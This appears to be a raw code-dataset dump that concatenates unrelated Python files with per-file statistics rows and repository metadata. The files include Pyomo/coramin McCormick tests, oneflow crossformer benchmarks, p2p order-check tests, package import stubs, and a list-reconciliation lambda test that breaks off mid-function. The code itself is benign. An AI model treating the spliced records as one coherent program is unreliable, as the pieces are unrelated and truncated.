                attributes=[
                    objects.Attribute(
                        attribute_name=objects.Attribute.AttributeName(
                            "State"
                        ),
                        attribute_value=primitives.Enumeration(
                            enums.State,
                            value=state_value,
                            tag=enums.Tags.STATE
                        )
                    )
                ]
            )
        )

    a = build(enums.State.PRE_ACTIVE)
    b = build(enums.State.ACTIVE)
    for left, right in ((a, b), (b, a)):
        self.assertTrue(left != right)
def test_not_equal_on_type_mismatch(self):
    """
    Test that the inequality operator returns True when comparing two
    Create response payloads with different types.
    """
    a = payloads.CreateResponsePayload()
    b = "invalid"
    # Comparison against a foreign type is unequal in both directions.
    for left, right in ((a, b), (b, a)):
        self.assertTrue(left != right)
| 38.028954
| 79
| 0.521107
| 6,006
| 70,924
| 6.039294
| 0.048452
| 0.037384
| 0.031016
| 0.039176
| 0.963967
| 0.956247
| 0.937665
| 0.93342
| 0.927354
| 0.925232
| 0
| 0.05228
| 0.405589
| 70,924
| 1,864
| 80
| 38.049356
| 0.808103
| 0.13279
| 0
| 0.752294
| 0
| 0.021877
| 0.121416
| 0.078694
| 0
| 0
| 0
| 0
| 0.090332
| 1
| 0.038109
| false
| 0
| 0.00494
| 0
| 0.04446
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e62203163b014ffdba47a66c63c9e10cb750de3f
| 68
|
py
|
Python
|
kernels/utils/__init__.py
|
sirCamp/tensorflow-kernels
|
e3d459406f463bb646e150c3bab89d8410f86f16
|
[
"MIT"
] | 3
|
2019-10-19T09:21:04.000Z
|
2020-09-25T14:45:38.000Z
|
kernels/utils/__init__.py
|
sirCamp/tensorflow-kernels
|
e3d459406f463bb646e150c3bab89d8410f86f16
|
[
"MIT"
] | null | null | null |
kernels/utils/__init__.py
|
sirCamp/tensorflow-kernels
|
e3d459406f463bb646e150c3bab89d8410f86f16
|
[
"MIT"
] | null | null | null |
from utils import array_to_tensor
from utils import tensor_to_array
| 22.666667
| 33
| 0.882353
| 12
| 68
| 4.666667
| 0.5
| 0.321429
| 0.535714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 68
| 2
| 34
| 34
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
053bdf80bb78f649636efa51b24fa1d244e84c1f
| 3,653
|
py
|
Python
|
coramin/relaxations/tests/test_mccormick.py
|
dilr/Coramin
|
22187e5f9e1631867c29f981ff6dc035341bd23d
|
[
"BSD-3-Clause"
] | 11
|
2019-04-03T21:33:29.000Z
|
2022-02-28T06:07:03.000Z
|
coramin/relaxations/tests/test_mccormick.py
|
dilr/Coramin
|
22187e5f9e1631867c29f981ff6dc035341bd23d
|
[
"BSD-3-Clause"
] | 50
|
2019-04-01T18:48:14.000Z
|
2022-03-04T21:51:27.000Z
|
coramin/relaxations/tests/test_mccormick.py
|
dilr/Coramin
|
22187e5f9e1631867c29f981ff6dc035341bd23d
|
[
"BSD-3-Clause"
] | 9
|
2019-03-31T21:29:35.000Z
|
2021-09-02T02:33:40.000Z
|
import pyomo.environ as pyo
import unittest
import coramin
class TestMcCormick(unittest.TestCase):
    """Tests for coramin's piecewise McCormick relaxation of the bilinear
    term aux_var = x1 * x2, solved as LPs with known optima.

    All tests solve with the 'gurobi_direct' solver, which must be
    installed and licensed for this suite to run.
    """

    @classmethod
    def setUpClass(cls):
        # No shared fixtures; each test builds its own model.
        pass

    @classmethod
    def tearDownClass(cls):
        pass

    def test_mccormick1(self):
        """Relaxation attached by calling build() directly on the block."""
        model = pyo.ConcreteModel()
        model.x = pyo.Var(bounds=(0, 6))
        model.y = pyo.Var(bounds=(0, 3))
        model.w = pyo.Var()
        # Minimizing -w - 2x == maximizing w + 2x subject to w <= 12.
        model.obj = pyo.Objective(expr=-model.w - 2 * model.x)
        model.con = pyo.Constraint(expr=model.w <= 12)
        model.mc = coramin.relaxations.PWMcCormickRelaxation()
        model.mc.build(x1=model.x, x2=model.y, aux_var=model.w)
        linsolver = pyo.SolverFactory('gurobi_direct')
        linsolver.solve(model)
        # Expected optimum: x at its upper bound (6), y at 2.
        self.assertAlmostEqual(pyo.value(model.x), 6.0, 6)
        self.assertAlmostEqual(pyo.value(model.y), 2.0, 6)

    def test_mccormick2(self):
        """Same model as test_mccormick1, but the relaxation is attached
        through a block rule instead of an explicit build() call."""
        model = pyo.ConcreteModel()
        model.x = pyo.Var(bounds=(0, 6))
        model.y = pyo.Var(bounds=(0, 3))
        model.w = pyo.Var()
        model.obj = pyo.Objective(expr=-model.w - 2 * model.x)
        model.con = pyo.Constraint(expr=model.w <= 12)

        def mc_rule(b):
            # The rule closes over `model` directly.
            b.build(x1=model.x, x2=model.y, aux_var=model.w)
        model.mc = coramin.relaxations.PWMcCormickRelaxation(rule=mc_rule)
        linsolver = pyo.SolverFactory('gurobi_direct')
        linsolver.solve(model)
        self.assertAlmostEqual(pyo.value(model.x), 6.0, 6)
        self.assertAlmostEqual(pyo.value(model.y), 2.0, 6)

    def test_mccormick3_BOTH(self):
        """Rule variant that reaches the model via parent_block(); the
        default relaxation side (both over- and under-estimators) is used."""
        model = pyo.ConcreteModel()
        model.x = pyo.Var(bounds=(0, 6))
        model.y = pyo.Var(bounds=(0, 3))
        model.w = pyo.Var()
        model.obj = pyo.Objective(expr=-model.w - 2 * model.x)
        model.con = pyo.Constraint(expr=model.w <= 12)

        def mc_rule(b):
            m = b.parent_block()
            b.build(x1=m.x, x2=m.y, aux_var=m.w)
        model.mc = coramin.relaxations.PWMcCormickRelaxation(rule=mc_rule)
        # NOTE(review): tee=True is passed to SolverFactory rather than to
        # solve(); presumably meant to echo solver output — confirm it has
        # the intended effect for this solver interface.
        linsolver = pyo.SolverFactory('gurobi_direct', tee=True)
        linsolver.solve(model)
        self.assertAlmostEqual(pyo.value(model.x), 6.0, 6)
        self.assertAlmostEqual(pyo.value(model.y), 2.0, 6)

    def test_mccormick3_OVER(self):
        """Only the overestimators of w = x*y are generated."""
        model = pyo.ConcreteModel()
        model.x = pyo.Var(bounds=(0, 6))
        model.y = pyo.Var(bounds=(0, 3))
        model.w = pyo.Var()
        # Small penalties on x and y break ties in the relaxed optimum.
        model.obj = pyo.Objective(expr=-model.w + 0.1*model.x + 0.1*model.y)
        model.con = pyo.Constraint(expr=model.w <= 12)

        def mc_rule(b):
            m = b.parent_block()
            b.build(x1=m.x, x2=m.y, aux_var=m.w, relaxation_side=coramin.utils.RelaxationSide.OVER)
        model.mc = coramin.relaxations.PWMcCormickRelaxation(rule=mc_rule)
        linsolver = pyo.SolverFactory('gurobi_direct')
        linsolver.solve(model)
        self.assertAlmostEqual(pyo.value(model.x), 4.0, 6)
        self.assertAlmostEqual(pyo.value(model.y), 2.0, 6)

    def test_mccormick3_UNDER(self):
        """Only the underestimators are generated; with no upper envelope on
        w, only the w <= 12 constraint binds, so just w is checked."""
        model = pyo.ConcreteModel()
        model.x = pyo.Var(bounds=(0, 6))
        model.y = pyo.Var(bounds=(0, 3))
        model.w = pyo.Var()
        model.obj = pyo.Objective(expr=-model.w - 2 * model.x)
        model.con = pyo.Constraint(expr=model.w <= 12)

        def mc_rule(b):
            m = b.parent_block()
            b.build(x1=m.x, x2=m.y, aux_var=m.w, relaxation_side=coramin.utils.RelaxationSide.UNDER)
        model.mc = coramin.relaxations.PWMcCormickRelaxation(rule=mc_rule)
        # NOTE(review): tee=True on SolverFactory — see test_mccormick3_BOTH.
        linsolver = pyo.SolverFactory('gurobi_direct', tee=True)
        linsolver.solve(model)
        self.assertAlmostEqual(pyo.value(model.w), 12.0, 6)
| 35.466019
| 100
| 0.612373
| 509
| 3,653
| 4.333988
| 0.133595
| 0.048957
| 0.054397
| 0.05893
| 0.896646
| 0.875793
| 0.875793
| 0.875793
| 0.875793
| 0.875793
| 0
| 0.029263
| 0.242267
| 3,653
| 102
| 101
| 35.813725
| 0.767702
| 0
| 0
| 0.753086
| 0
| 0
| 0.017794
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 1
| 0.135802
| false
| 0.024691
| 0.037037
| 0
| 0.185185
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0546bcddbb513242432023435efa8c4237b6ba70
| 125
|
py
|
Python
|
mountainlab_pytools/__init__.py
|
tjd2002/mountainlab_pytools
|
19b4ab06b073a7cfd9535b9285fd95471e731df9
|
[
"Apache-2.0"
] | null | null | null |
mountainlab_pytools/__init__.py
|
tjd2002/mountainlab_pytools
|
19b4ab06b073a7cfd9535b9285fd95471e731df9
|
[
"Apache-2.0"
] | null | null | null |
mountainlab_pytools/__init__.py
|
tjd2002/mountainlab_pytools
|
19b4ab06b073a7cfd9535b9285fd95471e731df9
|
[
"Apache-2.0"
] | 1
|
2019-01-19T04:07:15.000Z
|
2019-01-19T04:07:15.000Z
|
from mountainlab_pytools import mdaio
from mountainlab_pytools import processormanager
from mountainlab_pytools import mlproc
| 41.666667
| 48
| 0.912
| 15
| 125
| 7.4
| 0.466667
| 0.405405
| 0.594595
| 0.756757
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088
| 125
| 3
| 49
| 41.666667
| 0.973684
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
0558f8c316f4258b3bc2770e9297874dda77ceb9
| 90
|
py
|
Python
|
nami/AI/__init__.py
|
namirinz/nami
|
b74b3d302aa241470ce6ae210c5a2f0e09dd8bf2
|
[
"MIT"
] | 2
|
2020-08-03T10:37:45.000Z
|
2020-10-11T14:55:05.000Z
|
nami/AI/__init__.py
|
namirinz/nami
|
b74b3d302aa241470ce6ae210c5a2f0e09dd8bf2
|
[
"MIT"
] | null | null | null |
nami/AI/__init__.py
|
namirinz/nami
|
b74b3d302aa241470ce6ae210c5a2f0e09dd8bf2
|
[
"MIT"
] | null | null | null |
from nami.AI.kme_tokenize import Tokenizer
from nami.AI.kme_tokenize import Segmentation
| 22.5
| 45
| 0.855556
| 14
| 90
| 5.357143
| 0.571429
| 0.213333
| 0.266667
| 0.346667
| 0.72
| 0.72
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 90
| 3
| 46
| 30
| 0.925926
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
0575edf17964e46cc3a15db61b68f332ba3a0446
| 94
|
py
|
Python
|
python/datadict/core/dto/__init__.py
|
jiportilla/ontology
|
8a66bb7f76f805c64fc76cfc40ab7dfbc1146f40
|
[
"MIT"
] | null | null | null |
python/datadict/core/dto/__init__.py
|
jiportilla/ontology
|
8a66bb7f76f805c64fc76cfc40ab7dfbc1146f40
|
[
"MIT"
] | null | null | null |
python/datadict/core/dto/__init__.py
|
jiportilla/ontology
|
8a66bb7f76f805c64fc76cfc40ab7dfbc1146f40
|
[
"MIT"
] | null | null | null |
from .punctuation_kb import the_apostrophes_dict
from .enclitics_kb import the_enclitics_dict
| 31.333333
| 48
| 0.893617
| 14
| 94
| 5.571429
| 0.571429
| 0.205128
| 0.282051
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085106
| 94
| 2
| 49
| 47
| 0.906977
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e9b5bdac13c646674c115ffb4126110ce82ffdc2
| 2,536
|
py
|
Python
|
test/node/test_send_orders_to_on_chain_check.py
|
0xProject/p2p_incentives
|
ce69926eb3d003fb2767651df9486556c0e20ab6
|
[
"Apache-2.0"
] | 3
|
2020-03-11T19:42:48.000Z
|
2021-04-01T21:09:05.000Z
|
test/node/test_send_orders_to_on_chain_check.py
|
0xProject/p2p_incentives
|
ce69926eb3d003fb2767651df9486556c0e20ab6
|
[
"Apache-2.0"
] | null | null | null |
test/node/test_send_orders_to_on_chain_check.py
|
0xProject/p2p_incentives
|
ce69926eb3d003fb2767651df9486556c0e20ab6
|
[
"Apache-2.0"
] | null | null | null |
"""
This module contains unit tests of send_orders_to_on_chain_check().
"""
from typing import List
import pytest
from message import Order
from node import Peer
from ..__init__ import (
SCENARIO_SAMPLE,
ENGINE_SAMPLE,
create_a_test_peer,
create_test_orders,
)
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_send_orders_to_on_chain_check__new_entry(scenario, engine) -> None:
    """
    Unit test of send_orders_to_on_chain_check() when
    peer.verification_time_orders_mapping[new_entry] does not exist yet.
    """
    # Arrange: three orders queued at time 0, four more at time 8.
    my_peer: Peer = create_a_test_peer(scenario, engine)[0]
    orders: List[Order] = create_test_orders(scenario, 7)
    my_peer.verification_time_orders_mapping[0] += orders[:3]
    my_peer.verification_time_orders_mapping[8] = orders[3:]
    # Act: the on-chain check is scheduled to finish at time 6.
    my_peer.send_orders_to_on_chain_check(6)
    # Assert: the time-0 batch moved into a new time-6 entry, the time-8
    # batch was left alone, and the time-0 entry is now empty.
    for order in orders[:3]:
        assert order in my_peer.verification_time_orders_mapping[6]
    for order in orders[3:]:
        assert order in my_peer.verification_time_orders_mapping[8]
    assert not my_peer.verification_time_orders_mapping[0]
@pytest.mark.parametrize("scenario,engine", [(SCENARIO_SAMPLE, ENGINE_SAMPLE)])
def test_send_orders_to_on_chain_check__existing_entry(scenario, engine) -> None:
    """
    This function is the unit test of send_orders_to_on_chain_check(), when the
    peer.verification_time_orders_mapping[new_entry] already exists.
    """
    # Arrange.
    my_peer: Peer = create_a_test_peer(scenario, engine)[0]
    order_list: List[Order] = create_test_orders(scenario, 7)
    # let the first three orders be in my_peer.verification_time_orders_mapping[0]
    my_peer.verification_time_orders_mapping[0] += order_list[0:3]
    # let the rest four orders be in my_peer.verification_time_orders_mapping[6]
    # (the entry already exists before the call, unlike the __new_entry case)
    my_peer.verification_time_orders_mapping[6] = order_list[3:7]
    # Act.
    # now send orders to on-chain check and it is supposed to be finished at time 6.
    my_peer.send_orders_to_on_chain_check(6)
    # Assert.
    # all seven orders should end up merged into the existing time-6 entry.
    for order in order_list:
        assert order in my_peer.verification_time_orders_mapping[6]
    assert not my_peer.verification_time_orders_mapping[0]
| 36.753623
| 84
| 0.754338
| 396
| 2,536
| 4.474747
| 0.176768
| 0.057562
| 0.1693
| 0.22009
| 0.88149
| 0.870767
| 0.870767
| 0.854966
| 0.854402
| 0.776524
| 0
| 0.015581
| 0.164827
| 2,536
| 68
| 85
| 37.294118
| 0.821058
| 0.337539
| 0
| 0.4375
| 0
| 0
| 0.018484
| 0
| 0
| 0
| 0
| 0
| 0.15625
| 1
| 0.0625
| false
| 0
| 0.15625
| 0
| 0.21875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e9bbb7efcfd8c949ed7e375c6adc3c11a6b31995
| 1,618
|
py
|
Python
|
benchmark/test_crossformer.py
|
Oneflow-Inc/vision
|
352e9240f63118112ea174bb2d0b502fa54be16f
|
[
"BSD-3-Clause"
] | 40
|
2021-10-19T02:34:56.000Z
|
2022-03-25T07:49:44.000Z
|
benchmark/test_crossformer.py
|
Oneflow-Inc/vision
|
352e9240f63118112ea174bb2d0b502fa54be16f
|
[
"BSD-3-Clause"
] | 53
|
2021-10-22T02:24:44.000Z
|
2022-03-31T04:20:47.000Z
|
benchmark/test_crossformer.py
|
Oneflow-Inc/vision
|
352e9240f63118112ea174bb2d0b502fa54be16f
|
[
"BSD-3-Clause"
] | 11
|
2022-01-06T02:57:07.000Z
|
2022-03-23T15:19:51.000Z
|
from benchmark import *
import oneflow_benchmark
from flowvision.models.crossformer import crossformer_tiny_patch4_group7_224
def _benchmark_crossformer(benchmark, net, input_shape):
    """Build *net* and its optimizer for inputs of *input_shape*, then time
    one training step via the benchmark fixture."""
    model, x, optimizer = fetch_args(net, input_shape)
    benchmark(run, model, x, optimizer)


# The per-batch-size tests below share one body; only input_shape differs.
# Signatures (including the net/input_shape defaults) are preserved so the
# benchmark harness and any callers see an unchanged interface.
# NOTE(review): the mutable list defaults are read-only here, so they are
# kept as-is to match the file's convention.

@oneflow_benchmark.ci_settings(compare={"median": "5%"})
def test_crossformer_tiny_patch4_group7_224_batch_size1(
    benchmark, net=crossformer_tiny_patch4_group7_224, input_shape=[1, 3, 224, 224]
):
    _benchmark_crossformer(benchmark, net, input_shape)


@oneflow_benchmark.ci_settings(compare={"median": "5%"})
def test_crossformer_tiny_patch4_group7_224_batch_size2(
    benchmark, net=crossformer_tiny_patch4_group7_224, input_shape=[2, 3, 224, 224]
):
    _benchmark_crossformer(benchmark, net, input_shape)


@oneflow_benchmark.ci_settings(compare={"median": "5%"})
def test_crossformer_tiny_patch4_group7_224_batch_size4(
    benchmark, net=crossformer_tiny_patch4_group7_224, input_shape=[4, 3, 224, 224]
):
    _benchmark_crossformer(benchmark, net, input_shape)


@oneflow_benchmark.ci_settings(compare={"median": "5%"})
def test_crossformer_tiny_patch4_group7_224_batch_size8(
    benchmark, net=crossformer_tiny_patch4_group7_224, input_shape=[8, 3, 224, 224]
):
    _benchmark_crossformer(benchmark, net, input_shape)


@oneflow_benchmark.ci_settings(compare={"median": "5%"})
def test_crossformer_tiny_patch4_group7_224_batch_size16(
    benchmark, net=crossformer_tiny_patch4_group7_224, input_shape=[16, 3, 224, 224]
):
    _benchmark_crossformer(benchmark, net, input_shape)
| 36.772727
| 84
| 0.772559
| 226
| 1,618
| 5.154867
| 0.172566
| 0.141631
| 0.198283
| 0.254936
| 0.905579
| 0.879828
| 0.879828
| 0.879828
| 0.879828
| 0.656652
| 0
| 0.074669
| 0.114339
| 1,618
| 43
| 85
| 37.627907
| 0.738311
| 0
| 0
| 0.606061
| 0
| 0
| 0.024722
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.151515
| false
| 0
| 0.090909
| 0
| 0.242424
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
756b5031278f6df402a9779f956a99892950bb6a
| 600
|
py
|
Python
|
src/mmgroup/generate_c/__init__.py
|
Martin-Seysen/mmgroup
|
6acd566f1079e7e27eec76352477fbba39eeb65f
|
[
"MIT"
] | 14
|
2020-07-10T20:12:05.000Z
|
2022-03-10T13:46:59.000Z
|
src/mmgroup/generate_c/__init__.py
|
Martin-Seysen/mmgroup
|
6acd566f1079e7e27eec76352477fbba39eeb65f
|
[
"MIT"
] | 1
|
2022-03-09T07:05:04.000Z
|
2022-03-18T20:17:11.000Z
|
src/mmgroup/generate_c/__init__.py
|
Martin-Seysen/mmgroup
|
6acd566f1079e7e27eec76352477fbba39eeb65f
|
[
"MIT"
] | 1
|
2022-02-07T21:08:00.000Z
|
2022-02-07T21:08:00.000Z
|
from mmgroup.generate_c.generate_functions import prepend_blanks
from mmgroup.generate_c.generate_functions import format_item
from mmgroup.generate_c.generate_functions import UserDirective
from mmgroup.generate_c.generate_functions import UserFormat
from mmgroup.generate_c.generate_functions import make_table
from mmgroup.generate_c.make_c_tables import TableGenerator
from mmgroup.generate_c.make_c_tables import make_doc
from mmgroup.generate_c.make_c_tables import c_snippet
from mmgroup.generate_c.make_pyx import pxd_to_pyx
from mmgroup.generate_c.make_pyx import pxd_to_function_list
| 35.294118
| 64
| 0.89
| 93
| 600
| 5.387097
| 0.247312
| 0.219561
| 0.379242
| 0.399202
| 0.802395
| 0.802395
| 0.802395
| 0.373253
| 0.151697
| 0
| 0
| 0
| 0.076667
| 600
| 16
| 65
| 37.5
| 0.904332
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 10
|
756d2da7bd158f2bed11aa9c1387ba937c40a906
| 14,776
|
py
|
Python
|
test/unit/validate_and_forward/test_validate_and_forward.py
|
NHSDigital/list-reconciliation
|
37b1ebe99a64275e23b0e7fb6a89415b92d14306
|
[
"MIT"
] | 4
|
2021-06-25T08:28:54.000Z
|
2021-12-16T11:03:42.000Z
|
test/unit/validate_and_forward/test_validate_and_forward.py
|
NHSDigital/list-reconciliation
|
37b1ebe99a64275e23b0e7fb6a89415b92d14306
|
[
"MIT"
] | 184
|
2021-06-24T15:27:08.000Z
|
2022-03-17T12:44:28.000Z
|
test/unit/validate_and_forward/test_validate_and_forward.py
|
NHSDigital/list-reconciliation
|
37b1ebe99a64275e23b0e7fb6a89415b92d14306
|
[
"MIT"
] | 3
|
2021-11-05T10:21:44.000Z
|
2022-03-04T14:29:24.000Z
|
import json
import boto3
import pytest
from database import Jobs
from freezegun import freeze_time
from jobs.statuses import JobStatus, ParseStatus
from lr_logging.exceptions import InvalidFilename, InvalidGPExtract, InvalidStructure
from pynamodb.exceptions import PutError, QueryError
from .conftest import INPUT_BUCKET, MESH_BUCKET, REJECTION_BUCKET
# Fixed job id so tests can create a job and look it up deterministically.
JOB_ID = "50e1b957-2fc4-44b0-8e60-d8f9ca162099"
# S3 keys of the fixture GP extracts used by the tests below.
# NOTE(review): presumably the A12023/.CSB name marks the invalid fixture
# and the A8202x/.CSA names the valid/unicode ones — confirm in conftest.
INVALID_FILE = "inbound/A12023_GPR4LNA1.CSB"
VALID_FILE = "inbound/A82024_GPR4LNA1.CSA"
FILE_WITH_ONE_UNICODE_CHARACTER = "inbound/A82025_GPR4LNA1.CSA"
FILE_WITH_MULTIPLE_UNICODE_CHARACTERS = "inbound/A82026_GPR4LNA1.CSA"
@freeze_time("2021-03-28 13:40:00")
def test_validate_and_forward_valid_file_ok(
    lambda_handler,
    lambda_context,
    valid_file_event,
    create_mesh_bucket,
    create_dynamodb_table,
):
    """A valid GP extract is processed and reported as sent."""
    response = lambda_handler.main(valid_file_event, lambda_context)
    assert response["message"] == "validate_and_forward file sent"
    assert response["file"] == VALID_FILE
@freeze_time("2021-03-28 13:40:00")
def test_validate_and_forward_invalid_file_ok(
    lambda_handler,
    lambda_context,
    invalid_file_event,
    create_rejection_bucket,
    create_dynamodb_table,
):
    """An invalid GP extract is rejected and the rejection is handled."""
    response = lambda_handler.main(invalid_file_event, lambda_context)
    assert response["message"] == (
        "Lambda application stopped gp extract input file rejected, rejected file handled"
    )
    assert response["file"] == INVALID_FILE
@freeze_time("2021-03-28 13:40:00")
def test_validate_and_forward_valid_file_in_dps_mesh_bucket(
    lambda_handler,
    lambda_context,
    valid_file_event,
    create_mesh_bucket,
    create_dynamodb_table,
):
    """A valid GP extract is forwarded to the DPS MESH bucket with the
    expected transformed body.

    Fix: the original asserted inside ``for obj in bucket listing`` — with an
    empty bucket the loop body never ran and the test passed vacuously. The
    listing is now required to be non-empty.
    """
    app = lambda_handler
    response = app.main(valid_file_event, lambda_context)
    assert response["message"] == "validate_and_forward file sent"
    assert response["file"] == VALID_FILE

    client = boto3.client("s3")
    contents = client.list_objects_v2(Bucket=MESH_BUCKET).get("Contents", [])
    assert contents, "expected at least one forwarded object in the MESH bucket"

    expected_file_body = "503\\*\nDOW~1~1111111,1234~LNA~20210328~1340~1557492~1234567890~SOMEBODY~JOHN~SOMEONE~MR~1~20020101~FLAT A~THE STREET\nDOW~2~~EAST~~E1 1AA~~3~~~\nDOW~1~1111111,1234~LNA~20210328~1340~1557493~1234567891~SOMEBODY~JANE~FOE~MISS~1~20120211~FLAT B~THE STREET\nDOW~2~~EAST~~E1 1AA~~3~~~\n"
    for obj in contents:
        file = client.get_object(Bucket=MESH_BUCKET, Key=str(obj["Key"]))
        file_body = file["Body"].read().decode("utf-8")
        assert len(file_body) == 280
        assert file_body == expected_file_body
@freeze_time("2021-03-28 13:40:00")
def test_validate_and_forward_invalid_file_in_rejection_bucket(
    lambda_handler,
    lambda_context,
    invalid_file_event,
    create_rejection_bucket,
    create_dynamodb_table,
):
    """An invalid GP extract produces a rejection record in the rejection
    bucket with the expected error payload.

    Fix: the original asserted inside ``for obj in bucket listing`` — with an
    empty bucket the test passed vacuously. The listing is now required to be
    non-empty.
    """
    app = lambda_handler
    response = app.main(invalid_file_event, lambda_context)
    assert response["message"] == (
        "Lambda application stopped gp extract input file rejected, rejected file handled"
    )
    assert response["file"] == INVALID_FILE

    client = boto3.client("s3")
    contents = client.list_objects_v2(Bucket=REJECTION_BUCKET).get("Contents", [])
    assert contents, "expected a rejection record in the rejection bucket"
    for obj in contents:
        file = client.get_object(Bucket=REJECTION_BUCKET, Key=str(obj["Key"]))
        json_content = json.loads(file["Body"].read().decode("utf-8"))
        assert json_content["file"] == "inbound/A12023_GPR4LNA1.CSB"
        assert json_content["error_type"] == "INVALID_STRUCTURE"
        assert json_content["message"] == ["Header must be 503\\*"]
@freeze_time("2021-03-28 13:40:00")
def test_validate_and_forward_valid_file_sent_status_db(
    lambda_handler,
    lambda_context,
    valid_file_event,
    create_mesh_bucket,
    create_dynamodb_table,
):
    """After a valid file is processed, the job row records SENT_TO_DPS and
    the extract's practice code.

    Fix: the original asserted inside ``for j in query`` — an empty query
    result made the test pass vacuously. The result is now materialized and
    required to be non-empty.
    """
    app = lambda_handler
    response = app.main(valid_file_event, lambda_context)
    assert response["message"] == "validate_and_forward file sent"
    assert response["file"] == VALID_FILE

    jobs = list(Jobs.IdIndex.query(app.job_id))
    assert jobs, "expected a job row for the processed file"
    for j in jobs:
        assert j.StatusId == JobStatus.SENT_TO_DPS.value
        assert j.PracticeCode == "A82024"
@freeze_time("2021-03-28 13:40:00")
def test_validate_and_forward_invalid_file_rejection_status_db(
    lambda_handler,
    lambda_context,
    invalid_file_event,
    create_rejection_bucket,
    create_dynamodb_table,
):
    """After an invalid file is processed, the job row records REJECTED with
    a PARSE_FAILED practice code.

    Fix: the original asserted inside ``for j in query`` — an empty query
    result made the test pass vacuously. The result is now materialized and
    required to be non-empty.
    """
    app = lambda_handler
    response = app.main(invalid_file_event, lambda_context)
    assert response["message"] == (
        "Lambda application stopped gp extract input file rejected, rejected file handled"
    )
    assert response["file"] == INVALID_FILE

    jobs = list(Jobs.IdIndex.query(app.job_id))
    assert jobs, "expected a job row for the rejected file"
    for j in jobs:
        assert j.StatusId == JobStatus.REJECTED.value
        assert j.PracticeCode == ParseStatus.PARSE_FAILED.value
@freeze_time("2021-03-28 13:40:00")
def test_validate_and_forward_create_initial_job(
    lambda_handler,
    lambda_context,
    upload_valid_file,
    create_dynamodb_table,
    create_mesh_bucket,
):
    """create_initial_job() writes a PENDING job row with a NOT_PARSED
    practice code.

    Fix: the original asserted inside ``for j in query`` — an empty query
    result made the test pass vacuously. The result is now materialized and
    required to be non-empty.
    """
    app = lambda_handler
    app.job_id = JOB_ID
    # NOTE(review): VALID_FILE already starts with "inbound/", so this yields
    # "inbound/inbound/..."; the doubled prefix matches the expected payloads
    # in the process_invalid_message tests — confirm it is intentional.
    app.input_file = f"inbound/{VALID_FILE}"
    app.create_initial_job()

    jobs = list(Jobs.IdIndex.query(JOB_ID))
    assert jobs, "expected the initial job row to be written"
    for j in jobs:
